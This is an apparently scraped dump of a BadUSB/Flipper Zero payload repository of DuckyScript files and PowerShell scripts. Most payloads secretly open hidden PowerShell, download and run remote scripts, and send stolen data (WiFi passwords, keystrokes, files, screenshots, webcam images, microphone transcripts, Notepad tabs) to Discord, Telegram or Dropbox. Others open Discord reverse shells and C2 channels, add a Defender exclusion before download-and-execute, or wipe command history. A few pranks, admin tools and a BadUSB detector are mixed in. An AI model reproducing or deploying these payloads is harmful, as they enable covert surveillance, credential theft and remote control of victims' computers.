powershell (remove "-W H" to show the window) 13 | DELAY 1000 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bw0chdbdc | iex 17 | ENTER 18 | 19 | 20 | -------------------------------------------------------------------------------- /Netcat-Client/Simple-Netcat-Client.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Beigeworm's Simple Netcat Client 3 | REM Author: @beigeworm 4 | REM Description: This script connects target computer with a netcat session to send powershell commands. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace IP_HERE with your netcat attacker IP Address. 9 | REM NOTE The PORT number is 4444 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM open powershell (remove "-W H" to show the window) 15 | DELAY 1000 16 | GUI r 17 | DELAY 750 18 | STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex 19 | ENTER 20 | 21 | -------------------------------------------------------------------------------- /Telegram-Infostealer/System-Info-to-Telegram.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's system information to Telegram Bot 3 | REM Author: @beigeworm 4 | REM Description: This script gathers system information and posts to Telegram Bot Chat with the results. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace BOT_TOKEN with your Telegram bot token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Telegram-Infostealer/main.ps1 | iex 18 | ENTER 19 | 20 | -------------------------------------------------------------------------------- /Telegram-Keylogger/Keylogger-to-Telegram.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Keyloggger to Telegram Chat. 3 | REM Author: @beigeworm 4 | REM Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace TOKEN_HERE with your Telegram token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Telegram-Keylogger/main.ps1 | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /Tools/Update Windows in Powershell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Update from Powershell 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to update windows. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (add "-W Hidden" to hide the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | STRING Install-Module PSWindowsUpdate 19 | ENTER 20 | DELAY 5000 21 | ENTER 22 | DELAY 5000 23 | STRING a 24 | ENTER 25 | DELAY 250 26 | STRING Get-WindowsUpdate -AcceptAll -Install -AutoReboot 27 | ENTER 28 | DELAY 10000 29 | STRING exit 30 | ENTER 31 | -------------------------------------------------------------------------------- /Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Exfiltrate files to Dropbox 3 | REM Author: @beigeworm 4 | REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace DROPBOX_TOKEN with your Dropbox Token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Dropbox/main.ps1 | iex 18 | ENTER 19 | 20 | -------------------------------------------------------------------------------- /Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Exfiltrate files to Telegram 3 | REM Author: @beigeworm 4 | REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace TELEGRAM_TOKEN with your Telegram Token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex 18 | ENTER 19 | 20 | -------------------------------------------------------------------------------- /Discord-Media-Hog/Discord-Media-Hog.txt: -------------------------------------------------------------------------------- 1 | REM Title: Discord-Media-Hog 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses a Discord bot to send system information, a stream desktop and webcam screenshots 4 | REM Description: READ SETUP IN MAIN.PS1 5 | REM Target: Windows 10 6 | 7 | REM *REQUIREMENTS* 8 | REM admin required for disable USB function. 9 | 10 | REM some setup for dukie script. 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window). 14 | GUI r 15 | DELAY 750 16 | STRING powershell -Exec Bypass -C $token = 'YOUR_BOT_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Discord-Media-Hog/main.ps1 | iex 17 | CTRL-SHIFT ENTER 18 | DELAY 2500 19 | ALT y 20 | -------------------------------------------------------------------------------- /Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Notepad Tabs to Discord Webhook. 2 | REM Author: @beigeworm 3 | REM Description: In Windows 11 notepad stores unsaved tabs for reopening notepad.... very unsafe. 4 | REM Description: This is a script to find any unsaved notes in notepad and send them to a discord webhook. 5 | REM Target: Windows 11 6 | 7 | REM *SETUP* 8 | REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0nptabstodc | iex 18 | ENTER 19 | 20 | 21 | -------------------------------------------------------------------------------- /BadUSB-Detect-and-Protect/README.md: -------------------------------------------------------------------------------- 1 | # BAD USB DETECTION AND PROTECTION 2 | 3 | **SYNOPSIS** 4 | 5 | This script runs passively in the background waiting for any new usb devices. 6 | When a new USB device is connected to the machine this script monitors keypresses for 60 seconds. 7 | If there are 13 or more keypresses detected within 200 milliseconds it will pause all inputs for 20 seconds. 8 | 9 | **USAGE** 10 | 11 | 1. Edit Options below (optional) and Run the script 12 | 2. A pop up will appear when monitoring is active and if a 'BadUSB' device is detected 13 | 3. logs are found in 'usblogs' folder in the temp directory. 14 | 5. Close the monitor in the system tray 15 | 16 | **REQUIREMENTS** 17 | 18 | Admin privlages are required for pausing keyboard and mouse inputs 19 | -------------------------------------------------------------------------------- /Download-and-Execute/Download-Execute.txt: -------------------------------------------------------------------------------- 1 | REM Title: Download-Execute from Run Prompt 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses the Run Prompt to download a file and run it. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace FILE_URL_HERE with the url of your file to run. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1; 16 | 17 | REM replace FILE_URL_HERE below. 18 | STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit 19 | 20 | CTRL-SHIFT ENTER 21 | DELAY 3000 22 | ALT y 23 | -------------------------------------------------------------------------------- /Pranks/Disable-Keyboard-Mouse-120s.txt: -------------------------------------------------------------------------------- 1 | REM Title: Disable Keyboard and Mouse 120s 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to disable all i/o devices for 120 seconds. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM admin required for disable function. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -W H -Ep Bypass -C $s='[DllImport(\"user32.dll\")][return: MarshalAs(UnmanagedType.Bool)]public static extern bool BlockInput(bool fBlockIt);';Add-Type -M $s -Name U -Names W;[W.U]::BlockInput($true);sleep 120;[W.U]::BlockInput($false) 16 | CTRL-SHIFT ENTER 17 | DELAY 2000 18 | ALT y 19 | 20 | -------------------------------------------------------------------------------- /Exfiltrate-to-USB/Exfiltrate-to-USB.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Exfiltrate files USB Drive 3 | REM Author: @beigeworm 4 | REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive. 5 | REM Target: Windows 10 6 | 7 | REM SETUP (optional) 8 | REM Add your USB drive Name in quotes for $driveName 9 | REM Add Y or N in quotes for $Hidden (hides console window) 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM open powershell 15 | DELAY 1000 16 | GUI r 17 | DELAY 750 18 | STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex 19 | ENTER 20 | 21 | -------------------------------------------------------------------------------- /Wallpaper-Jumpscare/main.ps1: -------------------------------------------------------------------------------- 1 | $url = "https://i.ibb.co/XJSPt9s/1.png" 2 | $outputPath = "$env:temp\img.jpg" 3 | $wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched 4 | 5 | IWR -Uri $url -OutFile $outputPath 6 | 7 | $signature = @' 8 | using System; 9 | using System.Runtime.InteropServices; 10 | 11 | public class Wallpaper { 12 | [DllImport("user32.dll", CharSet = CharSet.Auto)] 13 | public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); 14 | } 15 | '@ 16 | 17 | Add-Type -TypeDefinition $signature 18 | 19 | $SPI_SETDESKWALLPAPER = 0x0014 20 | $SPIF_UPDATEINIFILE = 0x01 21 | $SPIF_SENDCHANGE = 0x02 22 | 23 | [Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) 24 | -------------------------------------------------------------------------------- /Tools/Download-Execute from Run Prompt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Download-Execute from Run Prompt 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses the Run Prompt to download a file and run it. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace FILE_URL_HERE with the url of your file to run. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; 16 | 17 | REM replace FILE_URL_HERE below. 18 | STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit 19 | 20 | CTRL-SHIFT ENTER 21 | DELAY 1500 22 | ALT y 23 | DELAY 5000 24 | -------------------------------------------------------------------------------- /Tools/Set US Keyboard & System Language.txt: -------------------------------------------------------------------------------- 1 | REM Title: Set System Language 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US). 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window) 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM set system language to (example here is US) 19 | STRING Dism /online /Get-Intl 20 | ENTER 21 | DELAY 500 22 | STRING Set-WinSystemLocale en-US 23 | ENTER 24 | DELAY 500 25 | STRING Set-WinUserLanguageList en-US -force 26 | ENTER 27 | DELAY 500 28 | STRING exit 29 | ENTER 30 | 31 | -------------------------------------------------------------------------------- /Pranks/Persisant-Goose.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Persistant goose prank. 3 | REM Author: @beigeworm 4 | REM Description: Spawn an annoying goose and replace it if it's killed by the user. 5 | REM Target: Windows 10 and 11 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove "-W H" to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Ep Bypass -W H 15 | ENTER 16 | DELAY 4000 17 | STRING $url = "https://github.com/beigeworm/assets/raw/main/Goose.zip";$tempFolder = $env:TMP;$zipFile = Join-Path -Path $tempFolder -ChildPath "Goose.zip";$extractPath = Join-Path -Path $tempFolder -ChildPath "Goose";Invoke-WebRequest -Uri $url -OutFile $zipFile;Expand-Archive -Path $zipFile -DestinationPath $extractPath;$vbscript = "$extractPath\Goose.vbs";& $vbscript 18 | ENTER -------------------------------------------------------------------------------- /Tools/Clean-Command-History.txt: -------------------------------------------------------------------------------- 1 | REM Title: Clean Command History 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Empty the temp folder and recycle bin, clear run box and powershell history. 4 | REM Target: Windows 10 5 | REM Credit: I-Am-Jakoby 6 | 7 | REM some setup for dukie script. 8 | DEFAULT_DELAY 100 9 | 10 | GUI r 11 | DELAY 750 12 | 13 | REM open powershell (add "-W Hidden" to hide the window). 14 | STRING powershell -NoP -NonI -Exec Bypass 15 | CTRL-SHIFT ENTER 16 | DELAY 1500 17 | ALT y 18 | DELAY 5000 19 | 20 | STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue ; reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f ; Remove-Item (Get-PSreadlineOption).HistorySavePath ; Clear-RecycleBin -Force -ErrorAction SilentlyContinue 21 | ENTER 22 | DELAY 10000 23 | STRING exit 24 | ENTER 25 | -------------------------------------------------------------------------------- /Discord-C2/Discord C2 Client.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Discord Command And Control. 3 | REM Author: @beigeworm 4 | REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform. 5 | REM Target: Windows 10 and 11 6 | 7 | REM SETUP 8 | REM make a discord bot at https://discord.com/developers/applications/ 9 | REM add the bot to your discord server 10 | REM Change BOT_TOKEN below with your bot token 11 | REM Change CHANNEL_ID below to your channel id 12 | REM for more info goto - https://github.com/beigeworm/PoshCord-C2 13 | 14 | REM some setup for dukie script 15 | DEFAULT_DELAY 100 16 | 17 | REM open powershell (remove "-W H" to show the window) 18 | DELAY 1000 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bw0dcc2 | iex 22 | ENTER 23 | 24 | -------------------------------------------------------------------------------- /Pranks/Kill I-O Devices.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Mouse and Keyboard Killer. 2 | REM Author: @beigeworm 3 | REM Description: This script Disables mouse and keyboard input for a number of seconds. 4 | REM Target: Windows 10 5 | 6 | REM Setup: Change $WaitTime to desired amount of seconds.. 7 | 8 | REM some setup for dukie script 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -Ep Bypass 16 | CTRL-SHIFT ENTER 17 | DELAY 2500 18 | ALT y 19 | DELAY 5000 20 | 21 | STRING $WaitTime = 60 ;$PNPMice = Get-WmiObject Win32_USBControllerDevice | %{[wmi]$_.dependent} | ?{$_.pnpclass -eq 'Mouse'};$PNPMice.Disable();$PNPKeyboard = Get-WmiObject Win32_USBControllerDevice | %{[wmi]$_.dependent} | ?{$_.pnpclass -eq 'Keyboard'};$PNPKeyboard.Disable();Sleep $WaitTime;$PNPMice.Enable();$PNPKeyboard.Enable();exit 22 | ENTER -------------------------------------------------------------------------------- /OSINT/Discord WiFi Grabber.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Wifi Grabber to Discord 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to gather Wifi info and send it via Discord. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace YOUR_WEBHOOK_HERE with your discord webhook. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 4000 19 | 20 | STRING $w="YOUR_WEBHOOK_HERE";$a=(netsh wlan show profiles) -replace ".*:\s+";foreach ($b in $a) {$s=$b.Trim();$p=(netsh wlan show profiles name=$s key=clear);$l=$p | Select-String "Key Content";if($l){$k=$l -replace "Key Content\s*:\s+","";$o="$s : $k";$j = @{"username" = "$env:COMPUTERNAME" ;"content" = $o} | ConvertTo-Json;irm -Uri $w -Method Post -ContentType "application/json" -Body $j}} 21 | DELAY 500 22 | ENTER 23 | -------------------------------------------------------------------------------- /Netcat-Screenshare/Desktop Screenshare over Netcat.txt: -------------------------------------------------------------------------------- 1 | REM Title: Beigeworm's Screenshare Through Netcat 2 | REM Author: @beigeworm 3 | REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace YOUR_IP_HERE with your netcat attacker IP Address. 8 | REM Run script on target Windows system. 9 | REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) 10 | REM Then in a firefox browser on the Linux box > http://localhost:8080 11 | 12 | REM some setup for dukie script 13 | DEFAULT_DELAY 100 14 | 15 | REM open powershell (remove "-W H" to show the window) 16 | DELAY 1000 17 | GUI r 18 | DELAY 750 19 | STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Netcat-Screenshare/main.ps1 | iex 20 | ENTER 21 | -------------------------------------------------------------------------------- /Discord-Reverse-Shell/Discord-Reverse-Shell.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's Discord Reverse Shell. 3 | REM Author: @beigeworm 4 | REM Description: Using a Discord bot along with discords API to Act as a Powershell Terminal. 5 | REM Target: Windows 10 and 11 6 | 7 | REM SETUP 8 | REM make a discord bot at https://discord.com/developers/applications/ 9 | REM add the bot to your discord server 10 | REM Change BOT_TOKEN below with your bot token 11 | REM Change CHANNEL_ID below to your channel id 12 | REM for more info goto - https://github.com/beigeworm/PoshCord-C2 13 | 14 | REM some setup for dukie script 15 | DEFAULT_DELAY 100 16 | 17 | REM open powershell (remove "-W H" to show the window) 18 | DELAY 1000 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Discord-Reverse-Shell/main.ps1 | iex 22 | ENTER 23 | 24 | -------------------------------------------------------------------------------- /Tools/Base64 Decode & Execute.txt: -------------------------------------------------------------------------------- 1 | REM Title: Base64 Decode & Execute 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to decode a Base64 string and then execute the file. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace all placeholders throughout the script. 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window) 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 16 | CTRL-SHIFT ENTER 17 | DELAY 1500 18 | ALT y 19 | DELAY 5000 20 | 21 | REM *replace this below* 22 | STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES'; 23 | 24 | STRING $decodedFile = [System.Convert]::FromBase64String($b64); 25 | 26 | 27 | REM *replace NAME_HERE and desired filetype (example is .exe)* 28 | STRING $File = "NAME_HERE"+".exe"; 29 | 30 | STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File 31 | -------------------------------------------------------------------------------- /Screen-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | $seconds = 30 # Screenshot interval 3 | $a = 1 # Sceenshot amount 4 | 5 | # shortened URL Detection 6 | if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url} 7 | 8 | While ($a -gt 0){ 9 | $Filett = "$env:temp\SC.png" 10 | Add-Type -AssemblyName System.Windows.Forms 11 | Add-type -AssemblyName System.Drawing 12 | $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 13 | $Width = $Screen.Width 14 | $Height = $Screen.Height 15 | $Left = $Screen.Left 16 | $Top = $Screen.Top 17 | $bitmap = New-Object System.Drawing.Bitmap $Width, $Height 18 | $graphic = [System.Drawing.Graphics]::FromImage($bitmap) 19 | $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) 20 | $bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png) 21 | Start-Sleep 1 22 | curl.exe -F "file1=@$filett" $hookurl 23 | Start-Sleep 1 24 | Remove-Item -Path $filett 25 | Start-Sleep $seconds 26 | $a-- 27 | } 28 | -------------------------------------------------------------------------------- /Speech-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#=============================== Speech to Discord ==================================== 2 | 3 | SYNOPSIS 4 | Uses assembly 'System.Speech' to take audio input and convert to text and then send the text to discord. 5 | 6 | SETUP 7 | 1. Replace 'YOUR_WEBHOOK_HERE' with your discord webhook 8 | 9 | #> 10 | 11 | $dc = 'WEBHOOK_HERE' # can be shortened 12 | 13 | Add-Type -AssemblyName System.Speech 14 | $speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine 15 | $grammar = New-Object System.Speech.Recognition.DictationGrammar 16 | $speech.LoadGrammar($grammar) 17 | $speech.SetInputToDefaultAudioDevice() 18 | 19 | while ($true) { 20 | $result = $speech.Recognize() 21 | if ($result) { 22 | $results = $result.Text 23 | Write-Output $results 24 | if ($dc.Ln -ne 121){$dc = (irm $dc).url} 25 | $Body = @{'username' = $env:COMPUTERNAME ; 'content' = $results} 26 | irm -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json) 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /US-Keyboard-Layout/main.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | powershell -ep bypass -w h -c irm is.gd/3jgz85 | iex 3 | #> 4 | 5 | Dism /online /Get-Intl 6 | Set-WinSystemLocale en-US 7 | Set-WinUserLanguageList en-US -force 8 | 9 | $languageList = Get-WinUserLanguageList 10 | $usLanguagePack = $languageList | Where-Object LanguageTag -eq 'en-US' 11 | if (-not $usLanguagePack) { 12 | Write-Host "US English language pack is not installed. Installing..." 13 | Install-WinUserLanguageList -Language 'en-US' 14 | } 15 | 16 | foreach ($language in $languageList) { 17 | if ($language.LanguageTag -ne 'en-US') { 18 | Write-Host "Removing language pack: $($language.LanguageTag)" 19 | $languageList = $languageList | Where-Object LanguageTag -ne $language.LanguageTag 20 | } 21 | } 22 | 23 | if (-not ($languageList | Where-Object LanguageTag -eq 'en-US')) { 24 | $languageList += [cultureinfo]::GetCultureInfo('en-US') 25 | } 26 | 27 | Set-WinUILanguageOverride -Language 'en-US' 28 | Set-WinUserLanguageList -LanguageList $languageList -Force 29 | -------------------------------------------------------------------------------- /BadUSB-Detect-and-Protect/BadUSB-Detect-and-Protect.txt: -------------------------------------------------------------------------------- 1 | REM Title: BadUSB Detect and Protect 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: This script runs passively in the background waiting for any new usb devices. 4 | REM Description: When a new USB device is connected to the machine this script monitors keypresses for 30 seconds. 5 | REM Description: If there are 15 or more keypresses detected within 200 milliseconds it will attempt to disable the most recently connected USB device 6 | REM Description: LOGS are stored in 'usblogs' in 'temp' folder 7 | REM Target: Windows 10 8 | 9 | REM *REQUIREMENTS* 10 | REM admin required for disable USB function. 11 | 12 | REM some setup for dukie script. 13 | DEFAULT_DELAY 100 14 | 15 | REM open powershell (remove -W Hidden to show the window). 16 | GUI r 17 | DELAY 750 18 | STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/BadUSB-Detect-and-Protect/main.ps1 | iex 19 | CTRL-SHIFT ENTER 20 | DELAY 2500 21 | ALT y 22 | -------------------------------------------------------------------------------- /Webcam-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#========================== WEBCAM TO DISCORD ============================= 2 | 3 | SYNOPSIS 4 | download a webcam.dll file, find a webcam cand take a picture then send it to discord. 5 | 6 | #> 7 | 8 | $hookurl = "$dc" 9 | if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url} 10 | $dllPath = Join-Path -Path $env:TEMP -ChildPath "webcam.dll" 11 | if (-not (Test-Path $dllPath)) { 12 | $url = "https://github.com/beigeworm/assets/raw/main/webcam.dll" 13 | $webClient = New-Object System.Net.WebClient 14 | $webClient.DownloadFile($url, $dllPath) 15 | } 16 | Add-Type -Path $dllPath 17 | [Webcam.webcam]::init() 18 | [Webcam.webcam]::select(1) 19 | $imageBytes = [Webcam.webcam]::GetImage() 20 | $tempDir = [System.IO.Path]::GetTempPath() 21 | $imagePath = Join-Path -Path $tempDir -ChildPath "webcam_image.jpg" 22 | [System.IO.File]::WriteAllBytes($imagePath, $imageBytes) 23 | sleep 1 24 | curl.exe -F "file1=@$imagePath" $hookurl | Out-Null 25 | sleep 1 26 | Remove-Item -Path "$env:TEMP\webcam.dll" 27 | Remove-Item -Path $imagePath -Force 28 | -------------------------------------------------------------------------------- /Pranks/Mute-Button-Spam.txt: -------------------------------------------------------------------------------- 1 | REM Title: Rickroll with Max Volume spam 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to create a .vbs script to keep volume muted on a loop. 4 | REM Target: Windows 10 5 | 6 | REM ============================================================================= 7 | 8 | REM some setup for dukie script. 9 | LOCALE US 10 | DEFAULT_DELAY 100 11 | 12 | REM open powershell (remove -W Hidden to show the window). 13 | GUI r 14 | DELAY 750 15 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 16 | CONTROL SHIFT ENTER 17 | DELAY 1500 18 | ALT y 19 | DELAY 5000 20 | 21 | REM create the .vbs script to keep the volume maxed. 22 | STRING cmd 23 | ENTER 24 | STRING copy con volup.vbs 25 | ENTER 26 | STRING do 27 | ENTER 28 | STRING Set objShell = CreateObject("WScript.Shell") 29 | ENTER 30 | STRING objShell.SendKeys(chr(&hAD)) 31 | ENTER 32 | STRING WScript.Sleep 10 33 | ENTER 34 | STRING loop 35 | ENTER 36 | CTRL z 37 | ENTER 38 | STRING start volup.vbs 39 | ENTER 40 | DELAY 1000 41 | STRING exit 42 | ENTER 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /OSINT/Speech-to-Discord.txt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Speech to Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Write a transcript of audio from the mic and send to discord. 4 | REM Target: Windows 10 5 | 6 | REM SETUP 7 | REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | 15 | REM open powershell (add "-W Hidden" to hide the window). 16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING Add-Type -AssemblyName System.Speech;$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine;$grammar = New-Object System.Speech.Recognition.DictationGrammar;$speech.LoadGrammar($grammar);$speech.SetInputToDefaultAudioDevice();while($true){$result = $speech.Recognize();if ($result) {$results = $result.Text;Write-Output $results;$dc = 'WEBHOOK_HERE';$Body = @{'username' = $env:COMPUTERNAME ; 'content' = $results};irm -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}};exit 21 | ENTER 22 | -------------------------------------------------------------------------------- 